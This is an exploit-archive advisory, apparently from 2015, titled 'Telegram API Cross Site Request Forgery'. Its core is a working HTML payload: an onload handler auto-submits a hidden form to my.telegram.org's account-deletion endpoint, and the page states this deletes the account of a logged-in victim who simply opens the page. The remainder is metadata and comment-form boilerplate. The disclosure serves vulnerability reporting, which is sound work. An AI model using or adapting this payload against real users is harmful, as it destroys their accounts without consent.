Telegram API Cross Site Request Forgery

2015.07.03

Credit: C4T

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
**
** Exploit Author: C4T
**
** Vendor Homepage : http://my.telegram.org
**
** Google Dork: none
**
** Date: 06/27/2015
**
** Tested on: Windows 7
**
************************************************************************************
** Exploit Code:
******************

<body onload="document.exploit.submit()">
<form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>


*************************************************************************************
** Description:
******************

when a user is logging in telegram API just by openning a web page containing this exploit his account will be deleted.


Discovered by C4T
@ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
**
** More Details and Explanation:
**
** http://hatrhyme.com/CSRFInTelegram.pdf
**
******************************************************************************************

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Telegram API Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.